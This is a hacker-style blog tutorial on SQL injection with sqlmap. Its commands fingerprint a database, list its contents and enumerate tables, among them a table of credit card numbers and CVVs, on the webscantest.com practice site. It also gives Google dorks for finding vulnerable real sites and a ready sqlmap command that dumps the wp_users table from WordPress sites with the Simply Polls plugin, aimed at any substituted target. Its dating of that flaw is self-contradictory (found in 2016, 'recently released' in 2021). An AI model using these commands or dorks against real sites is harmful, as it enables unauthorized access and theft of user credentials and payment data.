top of page

Sqlmap 😈: Hacking MySQL & WordPress Sites😉 with SQL Injection 💉

Updated: Nov 30, 2022

CyberMoransđŸ€—

SQL Injection 💉 is one of the most prevalent and common attack on websites. Nearly every website has a database behind it containing confidential and valuable information 🧐 that can often be compromised by a well-designed SQL injection attack 😈

There are tonnes of SQL injection tools, but the most popular is sqlmap. In this tutorial, we will use sqlmap to compromise a MySQL database behind a website 😋

Generally, MySQL is teamed up with PHP and an Apache web-server (often referred to as LAMPP) to build dynamic, database-driven web sites 😋. Such content management and development packages as Drupal, Joomla, Wordpress, Ruby on Rails and others use MySQL as their default backend database. Millions of websites have MySQL backends and very often they are "homegrown" websites, without much attention to security 😝

In this post, a look into extracting information about an online MySQL database before we actually extract information from the database.


Sqlmap can be used for databases other than MySQL, such Microsoft's SQL Server and Oracle, but here we will focus its capabilities on those ubiquitous web sites that are built with PHP, Apache and MySQL such as WordPress, Joomla and Drupal 🧐


So, Morans, Lets ndu THIS!...đŸ’Ș


 

Start sqlmap 🚀

First, fire up Kali and go to Applications > Database Assessment > sqlmap, When you click on sqlmap, you see -- 👇


🚀 Find a Vulnerable WebSite🧐

To get into the website and, ultimately the database, we are looking for web sites that end in "php?id=xxx" where xxx represents some number. If you are familiar with google hacks/dorks can do a search on google by entering:

  • inurl:index.php?id=

  • inurl:gallery.php?id=

  • inurl:post.php?id=

  • inurl:article?id=

These 👆 dorks will bring up millions of web sites with this basic vulnerability criteria. If you are creative and ambitious, you can find numerous web sites that list vulnerable web sites. You might want to check these out😉


For us here, we will be hacking a website designed for this purpose, www.webscantest.com. You can practice on this web site and refine your skills without worrying about breaking any laws and selling a plot to make bail moneyđŸ€Ł


Sqlmap is a powerful tool, written in Python, it has so many options. We will just be scratching the surface of its capabilities in this Proof of concept đŸ€­


🚀 Determine the DBMS Behind the WebSite🧐

Before we begin hacking a web site, we need to gather information.


Let's begin by finding out what the DBMS is behind this web site.

on the terminal type 👇

sqlmap -u "the entire URL of the vulnerable web page"

thus 👇

sqlmap -u "http://www.webscantest.com/datastore/ search_get_by_id.php?id=4"

PS: The entire URL is enclosed in double quotation marks (") -- 👇

sqlmap returns results like that below -- 👇. Notice highlighted is the web site backend using MySQL 5.0👇


🚀 Find the Database🧐

Now that we know what the database management system (DBMS) is MySQL 5.0, we need to know what databases it contains. sqlmap can do that. We take the command used above and append it with --dbs, like -- 👇

sqlmap -u "http://www.webscantest.com/datastore/search_get_by_id.php?id=4" --dbs

Running this command against www.webscantest.com we get the results like -- 👇

Notice the two available databases, information schema and webscantest. Information schema is included in every MySQL installation and it includes information on all the objects in the MySQL instance, but not data of our interest. Although it can be beneficial to explore that database to find objects in all the databases in the instance, our attention is on the other database here, webscantest, that may have some valuable information. Let's dig some further -- 😋


🚀 Digging More Info from the Database🧐

So, the DBMS is (MySQL 5.0) and the name of a database of interest (webscantest). The next step is to try to determine the tables and columns in that database. In this way, we will have some idea of:

  1. what data is in the database,

  2. where it is and

  3. which type of data it contains (numeric or string).


All of this 👆 information is critical and necessary to extracting the data. To do this, we need to make some small edits to our sqlmap command. Everything else we have used above remains the same, but now we tell sqlmap we want to see the tables and columns from the webscantest database.


We can append our command with --columns -D and the name of the database, webscantest such as -- 👇


sqlmap -u "http://www.webscantest.com/datastore/search_get_by_id.php?id=4" --dbs --columns -D webscantest

Sqlmap 👆 will target the webscantest database and attempt to enumerate the tables and columns in this database. As you can see below, sqlmap successfully was able to enumerate three tables;

  1. accounts,

  2. inventory, and

  3. orders, complete with column names and datatypes.

Not Bad eeh! 👇


See 👆 that the orders table above includes credit card numbers, expiration dates and CVVđŸ€Ż In the next one, I'll show you how to extract that information💀

 

đŸ€– Complex/Modern sqlmap Attack on WordPress Sites ☠

A more advanced use of this tool; On December, 2016, a security researcher (Tad Group) found a vulnerability to an advanced SQL injection attack against WordPress websites that include the plug-in Simply Polls (https://wordpress.org/plugins/simply-polls/) .


Since this attack was just recently released (2021) and the millions of users have not yet patched, most of these sites are vulnerable😹


The sqlmap command to exploit those WordPress sites with Simply Polls plug-in is 👇

sqlmap -u "http://example.com/wp-admin/admin-ajax.php"--data="action=spAjaxResults&pollid=2" --dump -T wp_users -D wordpress --threads=10 --random-agent --dbms=mysql --level=5 --risk=3

Replace "example.com" with the URL of the vulnerable website.

Sqlmap can be very versatile and useful tool for MySQL, as well as MS SQL Server and Oracle database hacking đŸ„¶


For the next part, we extract this data from the db. Dont miss it...click here to proceed to part 2😋


 

Conclusion đŸ€–

Subscribe to receive notifications of similar posts 😋 where we will be reverse engineering malware and the technical aspect of vulnerabilities as well as how an attacker may use this vulnerability as an attack vector and other Infosec stuff...😋


Morans,

Thank you for your time, Like and leave a comment/review and as always, stay awesome! 😋👊 đŸ’Ș

1,440 views0 comments

Recent Posts

See All
Post: Blog2_Post
bottom of page